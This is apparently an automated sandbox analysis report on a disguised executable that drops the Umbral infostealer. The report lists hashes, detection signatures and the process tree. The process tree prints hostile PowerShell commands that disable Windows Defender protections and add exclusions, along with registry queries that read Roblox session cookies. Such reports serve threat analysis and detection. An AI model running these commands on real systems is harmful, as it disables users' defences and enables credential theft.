Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-06-2024 16:18
Static task
static1
Behavioral task
behavioral1
Sample
FIXER-2.3.exe
Resource
win10-20240404-en
General
-
Target
FIXER-2.3.exe
-
Size
678KB
-
MD5
c4a81b5b47dab29d88805f75c95035a0
-
SHA1
092fcb36a736198e19530c96991d9bcb0354fa75
-
SHA256
1ce288b4eace5690b66c6681e77f4f75d1c5fda07eab5a410ffe38271d515909
-
SHA512
eb98f91df470f6f52ad8db2d44da3a090b63d4067e371ca8df1b5e54e7623123d6ba7df779b27cf6298d7778b415e9569f29c62ef6276f8d666134ff4aa7006e
-
SSDEEP
6144:u4zMHU2N3RSUDqnopqonzuv4NIAyxuQiOfFs3OJ18xNz+KgbqUypit:u44RuS78onzuv4NIAAuQkOzu
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x001c00000002aae8-4.dat family_umbral behavioral2/memory/4248-13-0x000001FC899C0000-0x000001FC89A00000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4132 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 1 IoCs
pid Process 4248 Umbral.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 572 wmic.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4248 Umbral.exe 4132 powershell.exe 4132 powershell.exe 1636 powershell.exe 1636 powershell.exe 2644 powershell.exe 2644 powershell.exe 3268 powershell.exe 3268 powershell.exe 2948 powershell.exe 2948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4248 Umbral.exe Token: SeIncreaseQuotaPrivilege 4596 wmic.exe Token: SeSecurityPrivilege 4596 wmic.exe Token: SeTakeOwnershipPrivilege 4596 wmic.exe Token: SeLoadDriverPrivilege 4596 wmic.exe Token: SeSystemProfilePrivilege 4596 wmic.exe Token: SeSystemtimePrivilege 4596 wmic.exe Token: SeProfSingleProcessPrivilege 4596 wmic.exe Token: SeIncBasePriorityPrivilege 4596 wmic.exe Token: SeCreatePagefilePrivilege 4596 wmic.exe Token: SeBackupPrivilege 4596 wmic.exe Token: SeRestorePrivilege 4596 wmic.exe Token: SeShutdownPrivilege 4596 wmic.exe Token: SeDebugPrivilege 4596 wmic.exe Token: SeSystemEnvironmentPrivilege 4596 wmic.exe Token: SeRemoteShutdownPrivilege 4596 wmic.exe Token: SeUndockPrivilege 4596 wmic.exe Token: SeManageVolumePrivilege 4596 wmic.exe Token: 33 4596 wmic.exe Token: 34 4596 wmic.exe Token: 35 4596 wmic.exe Token: 36 4596 wmic.exe Token: SeIncreaseQuotaPrivilege 4596 wmic.exe Token: SeSecurityPrivilege 4596 wmic.exe Token: SeTakeOwnershipPrivilege 4596 wmic.exe Token: SeLoadDriverPrivilege 4596 wmic.exe Token: SeSystemProfilePrivilege 4596 wmic.exe Token: SeSystemtimePrivilege 4596 wmic.exe Token: SeProfSingleProcessPrivilege 4596 wmic.exe Token: SeIncBasePriorityPrivilege 4596 wmic.exe Token: SeCreatePagefilePrivilege 4596 wmic.exe Token: SeBackupPrivilege 4596 wmic.exe Token: SeRestorePrivilege 4596 wmic.exe Token: SeShutdownPrivilege 4596 wmic.exe Token: SeDebugPrivilege 4596 wmic.exe Token: SeSystemEnvironmentPrivilege 4596 wmic.exe Token: SeRemoteShutdownPrivilege 4596 wmic.exe Token: SeUndockPrivilege 4596 wmic.exe Token: SeManageVolumePrivilege 4596 wmic.exe Token: 33 4596 wmic.exe Token: 34 4596 wmic.exe Token: 35 4596 wmic.exe Token: 36 4596 wmic.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeIncreaseQuotaPrivilege 3988 wmic.exe Token: SeSecurityPrivilege 3988 wmic.exe Token: SeTakeOwnershipPrivilege 3988 wmic.exe Token: SeLoadDriverPrivilege 3988 wmic.exe Token: SeSystemProfilePrivilege 3988 wmic.exe Token: SeSystemtimePrivilege 3988 wmic.exe Token: SeProfSingleProcessPrivilege 3988 wmic.exe Token: SeIncBasePriorityPrivilege 3988 wmic.exe Token: SeCreatePagefilePrivilege 3988 wmic.exe Token: SeBackupPrivilege 3988 wmic.exe Token: SeRestorePrivilege 3988 wmic.exe Token: SeShutdownPrivilege 3988 wmic.exe Token: SeDebugPrivilege 3988 wmic.exe Token: SeSystemEnvironmentPrivilege 3988 wmic.exe Token: SeRemoteShutdownPrivilege 3988 wmic.exe Token: SeUndockPrivilege 3988 wmic.exe Token: SeManageVolumePrivilege 3988 wmic.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3440 wrote to memory of 4248 3440 FIXER-2.3.exe 79 PID 3440 wrote to memory of 4248 3440 FIXER-2.3.exe 79 PID 3440 wrote to memory of 2684 3440 FIXER-2.3.exe 80 PID 3440 wrote to memory of 2684 3440 FIXER-2.3.exe 80 PID 3440 wrote to memory of 2684 3440 FIXER-2.3.exe 80 PID 4248 wrote to memory of 4596 4248 Umbral.exe 82 PID 4248 wrote to memory of 4596 4248 Umbral.exe 82 PID 4248 wrote to memory of 4132 4248 Umbral.exe 85 PID 4248 wrote to memory of 4132 4248 Umbral.exe 85 PID 4248 wrote to memory of 1636 4248 Umbral.exe 87 PID 4248 wrote to memory of 1636 4248 Umbral.exe 87 PID 4248 wrote to memory of 2644 4248 Umbral.exe 89 PID 4248 wrote to memory of 2644 4248 Umbral.exe 89 PID 4248 wrote to memory of 3268 4248 Umbral.exe 91 PID 4248 wrote to memory of 3268 4248 Umbral.exe 91 PID 4248 wrote to memory of 3988 4248 Umbral.exe 93 PID 4248 wrote to memory of 3988 4248 Umbral.exe 93 PID 4248 wrote to memory of 1576 4248 Umbral.exe 95 PID 4248 wrote to memory of 1576 4248 Umbral.exe 95 PID 4248 wrote to memory of 3480 4248 Umbral.exe 97 PID 4248 wrote to memory of 3480 4248 Umbral.exe 97 PID 4248 wrote to memory of 2948 4248 Umbral.exe 99 PID 4248 wrote to memory of 2948 4248 Umbral.exe 99 PID 4248 wrote to memory of 572 4248 Umbral.exe 101 PID 4248 wrote to memory of 572 4248 Umbral.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\FIXER-2.3.exe"C:\Users\Admin\AppData\Local\Temp\FIXER-2.3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1576
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2948
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bum.bat" "2⤵PID:2684
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
948B
MD54f5f260adddac5f80eb2d1c0784a2e24
SHA18719894ff1664202f9e228c55f94d62dcaf12cce
SHA2567b41d9c769cb20c7ad73e7afa44f964fd7fe66be45d2b0a2ef438dc985433202
SHA512aa4a23298fda2e7bd6168bcb25b4a215616bccf73705e3566b6b576bf33bb9336682ace3354643332c940c5ee02eef59682a77447ba2f94e97ae0b4722ef0ba7
-
Filesize
1KB
MD557083a8e45ebe4fd84c7c0f137ec3e21
SHA1857b5ea57f7bcf03cadee122106c6e58792a9b84
SHA256f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40
SHA5124bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87
-
Filesize
1KB
MD559b93900cda86b5663a4d2111ef0e44e
SHA1249a631f4e755865a38a382850ccdcfe3a323908
SHA256364187cce435ad25306a6879c58c88adf58150b705402666e609c170edd47c86
SHA512005e069dfd2dd0026a2e4742646117eed8e48ff9c76e216978ef22d7b9bc50b83266b869712cd943095b083e04fe8c13e9c73f14a9c13f1e1ae714090dbd7594
-
Filesize
231KB
MD54726eb272b00df9ffd0274d16aa7c8ae
SHA1a3c98c19fd956d61f32e0fe214f855e4ac810904
SHA2567b5df9094a3d6133b309f01585bb2391b4e5e4c7d91737e25399e73053b219ad
SHA512bd8acb0ab507ac015cb213ec5baed52f60b7144c25e5b32828e8406a7a7264a708708a6149e09e80d83664eadda7381a440305e607c6511e101b51da2f2a110b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD512e75cc92bd7f9350f40745437a75e0f
SHA14deead6e14afc6df1afd88e91fd7caa1acf37294
SHA2560f8ebc8ff32f92408a8d383cceb1e1bc2dc0f0dfe1cffbfe808d82303c98f759
SHA512c43fdde607adaea7f2d8949dac5db7143553f8ef498f2801180c7cdcd31353dcd80af42ce65677305432bf8e5a59bf0f728b9cb4a69a14bca0e529342f03070d